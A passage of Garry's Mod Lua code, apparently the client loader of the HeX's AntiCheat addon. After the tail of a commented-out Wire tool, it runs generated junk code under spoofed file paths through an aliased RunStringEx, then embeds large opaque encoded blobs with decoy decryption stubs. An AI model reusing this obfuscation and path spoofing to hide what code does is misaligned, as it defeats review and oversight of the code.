		trace.Entity.IRadius = tonumber(self:GetClientInfo("iradius"))
		trace.Entity:Setup()
		return true
	end

	if (!self:GetSWEP():CheckLimit("wire_cd_disks")) then return false end

	local Ang = trace.HitNormal:Angle()
	Ang.pitch = Ang.pitch + 90

	local wire_cd_disk = MakeWireCDDisk(ply, trace.HitPos, Ang , self:GetClientInfo("model"),tonumber(self:GetClientInfo("skin")))
	wire_cd_disk.Precision = tonumber(self:GetClientInfo("precision"))
	wire_cd_disk.IRadius = tonumber(self:GetClientInfo("iradius"))
	wire_cd_disk:Setup()

	local min = wire_cd_disk:OBBMins()
	wire_cd_disk:SetPos(trace.HitPos - trace.HitNormal * min.z)

	local const = WireLib.Weld(wire_cd_disk, trace.Entity, trace.PhysicsBone, true)

	undo.Create("Wire CD Disk")
		undo.AddEntity(wire_cd_disk)
		undo.AddEntity(const)
		undo.SetPlayer(ply)
	undo.Finish()

	ply:AddCleanup("wire_cd_disks", wire_cd_disk)
	ply:AddCleanup("wire_cd_disks", const)

	return true
end*/


local function ValidString(v)
	return (v and type(v) == "string" and v != "")
end
local function StringCheck(str,check)
	return tostring(str):sub(1,#check) == check
end

for k,v in pairs( file.Find("HAC/*.lua", "LUA") ) do
	if ValidString(v) and ( StringCheck(v, "sh_") or StringCheck(v, "cl_") ) then
		include("HAC/"..v)
		HACInstalled = HACInstalled + 1
	end
end


local TRun ={
	"lua/autorun/client/cl_HAC.lua",
	"lua/autorun/client/nuke_config_client.lua",
	"lua/en_streamhks.lua",
	"lua/en_hac.lua",
	"lua/HAC/cl_EatKeys.lua",
	"lua/HAC/cl_Whoops.lua",
	"lua/HAC/cl_TakeSC.lua",
	"lua/HAC/sh_HacBurst.lua",
	"lua/HAC/cl_BindBuff.lua",
	"lua/lists/sh_W_HKS.lua",
	"lua/lists/cl_W_HAC.lua",
	"lua/lists/cl_B_HAC.lua",
	"lua/lists/sh_W_HKS_old.lua",
}


local DCX = [[
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil
]]

local Rev = string.reverse
local BSS = util.Base64Encode
local CCC = util.Compress
local SSL = string.lower

local function RunCrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 2 do
		a = a * a - a
		c = c..Rev( BSS( CCC(i..a..v..i..a) ) ) 
		a = a * a + a
	end
	return c.."]]\n"..DCX
end


local NotSX = NotSX or RunStringEx
local function OpenCrypt()
	for k,v in pairs(TRun) do
		local Crypt = SecretCrypt and SecretCrypt("HACLoadOpenCrypt", v) or RunCrypt(v)
		NotSX(Crypt, v)
		NotSX(Crypt, "addons/HeX's AntiCheat/"..v)
		v = SSL(v)
		NotSX(Crypt, v)
		NotSX(Crypt, "addons/hex's anticheat/"..v)
		Crypt = nil
	end
end
OpenCrypt()

timer.Simple(0, function()
	OpenCrypt()
	NotSX 	 = nil
	_G.NotSX = nil
end)




----------------------------------------
--         2014-07-12 20:33:07          --
------------------------------------------
local CCC = [[==AAAwRc
CxBKRAmw9j7AtuZw0Gf24ds2zsToJ6aBdM4vazqVCzrwo/gYqzaYYAAAAAAAAAAAtAQAAAQX==AYFFxB
GOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjYAAAAAAAAAAAtAQAAAQX==AYba2z
NOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADZAAAAAAAAAAAtAQAAAQX==AYF17l
VOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjZAAAAAAAAAAAtAQAAAQX==AYbKBY
dOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADaAAAAAAAAAAAtAQAAAQX==AYFlGK
lOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjaAAAAAAAAAAAtAQAAAQX==AYb6L8
sOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADbAAAAAAAAAAAtAQAAAQX==AYFVRu
0OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjbAAAAAAAAAAAtAQAAAQX==AYbqWg
8OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADcAAAAAAAAAAAtAQAAAQX==AYFFcS
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]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:33:07          --
------------------------------------------
local CCC = [[==AAAwRc
CxBKRAmw9j7AtuZw0Gf24ds2zsToJ6aBdM4vazqVCzrwo/gYqzaYYAAAAAAAAAAAtAQAAAQX==AYFFxB
GOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjYAAAAAAAAAAAtAQAAAQX==AYba2z
NOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADZAAAAAAAAAAAtAQAAAQX==AYF17l
VOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjZAAAAAAAAAAAtAQAAAQX==AYbKBY
dOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADaAAAAAAAAAAAtAQAAAQX==AYFlGK
lOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjaAAAAAAAAAAAtAQAAAQX==AYb6L8
sOC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADbAAAAAAAAAAAtAQAAAQX==AYFVRu
0OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoAjbAAAAAAAAAAAtAQAAAQX==AYbqWg
8OC3DUT4sbIplV9KTCCfN1KaCZOTwhIEe2nOJ1Nk4tegCRV8HoADcAAAAAAAAAAAtAQAAAQX==AYFFcS
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]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
